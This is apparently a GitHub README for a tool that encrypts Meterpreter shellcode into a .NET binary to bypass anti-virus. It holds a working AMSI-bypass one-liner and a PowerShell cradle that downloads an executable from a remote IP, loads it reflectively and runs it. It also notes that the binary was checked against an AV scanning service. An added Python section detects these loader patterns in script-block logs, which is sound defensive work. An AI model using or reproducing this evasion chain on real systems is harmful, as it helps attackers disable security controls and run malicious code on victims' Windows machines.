Shellcode Encryptor
A simple shellcode encryptor/decryptor/executor to bypass anti-virus.
Purpose
To generate a .NET binary containing Base64-encoded, AES-encrypted shellcode that will execute on a Windows target, bypassing anti-virus.
Download
git clone https://github.com/plackyhacker/Shellcode-Encryptor.git
Use
Use meterpreter_encryptor.py to create the encrypted, Base64-encoded shellcode.
Take the key and shellcode and insert them into ProcessInjector.cs:
// decrypt the base64 payload
string payload = "sZkMii [etc...]";
string key = "fjlmjiEgnQ4K6CjNCrPlqug1HW4icMec";
Compile the C# code into an executable (e.g., metInject.exe) and serve it via a web server.
Inject the executable into a remote PowerShell process:
# AMSI bypass
$a = [Ref].Assembly.GetTypes();ForEach($b in $a) {if ($b.Name -like "*iutils") {$c = $b}};$d = $c.GetFields('NonPublic,Static');ForEach($e in $d) {if ($e.Name -like "*itFailed") {$f = $e}};$f.SetValue($null,$true)
$bytes = (Invoke-WebRequest "http://192.168.1.228/metInject.exe").Content;
$assembly = [System.Reflection.Assembly]::Load($bytes);
$entryPointMethod = $assembly.GetType('ProcessInjection.Program', [Reflection.BindingFlags] 'Public, NonPublic').GetMethod('Main', [Reflection.BindingFlags] 'Static, Public, NonPublic');
$entryPointMethod.Invoke($null, (, [string[]] ('', '')));
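For defenders, the loader above leaves recognizable text in PowerShell Script Block Logging (event ID 4104). The following is an added example, not part of the original repository: a Python triage over constructed sample events that unions rule hits per process, because statements typed one at a time are logged as separate events. The event field names (host, pid, text), the rule names and the sample hosts and URLs are assumptions.

```python
import re
from collections import defaultdict

# Patterns taken from the loader on this page; PowerShell is case-insensitive.
RULES = {
    "nonpublic_static_field_access": re.compile(
        r"GetFields?\(\s*['\"]NonPublic\s*,\s*Static['\"]\s*\)", re.I),
    "web_download": re.compile(r"\bInvoke-WebRequest\b|\biwr\b", re.I),
    "reflective_assembly_load": re.compile(
        r"\[(?:System\.)?Reflection\.Assembly\]::Load\(", re.I),
    "reflective_entrypoint_lookup": re.compile(
        r"GetMethod\(\s*['\"]Main['\"]", re.I),
}

# Constructed sample events (not real logs): host, process ID, script block text.
SAMPLE_EVENTS = [
    {"host": "WS01", "pid": 4120, "text": "$d = $c.GetFields('NonPublic,Static')"},
    {"host": "WS01", "pid": 4120,
     "text": '$bytes = (Invoke-WebRequest "http://203.0.113.10/app.exe").Content;'},
    {"host": "WS01", "pid": 4120,
     "text": "$assembly = [System.Reflection.Assembly]::Load($bytes);"},
    {"host": "WS01", "pid": 4120,
     "text": "$m = $assembly.GetType('ProcessInjection.Program').GetMethod('Main', "
             "[Reflection.BindingFlags] 'Static, Public, NonPublic');"},
    {"host": "WS02", "pid": 900,
     "text": "Invoke-WebRequest https://example.com/report.csv -OutFile report.csv"},
    {"host": "WS03", "pid": 77,
     "text": "[System.Reflection.Assembly]::Load($signedBytes) | Out-Null"},
]

def match_rules(script_text):
    """Return the names of all rules that match one script block."""
    return {name for name, rx in RULES.items() if rx.search(script_text)}

def triage(events):
    """Union hits per (host, pid) and grade each process."""
    hits = defaultdict(set)
    for ev in events:
        hits[(ev["host"], ev["pid"])] |= match_rules(ev["text"])
    report = {}
    for proc, names in hits.items():
        if {"reflective_assembly_load", "web_download"} <= names:
            report[proc] = ("high", sorted(names))      # download plus in-memory load
        elif names - {"web_download"}:
            report[proc] = ("review", sorted(names))    # reflection without a download
    return report                                       # a download alone is not reported

if __name__ == "__main__":
    for proc, (grade, names) in triage(SAMPLE_EVENTS).items():
        print(proc, grade, names)
```

A plain download is deliberately not reported on its own; it only raises the grade when the same process also loads an assembly from memory.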
The binary was scanned using antiscan.me on 03/10/2021.
Source: https://github.com/plackyhacker/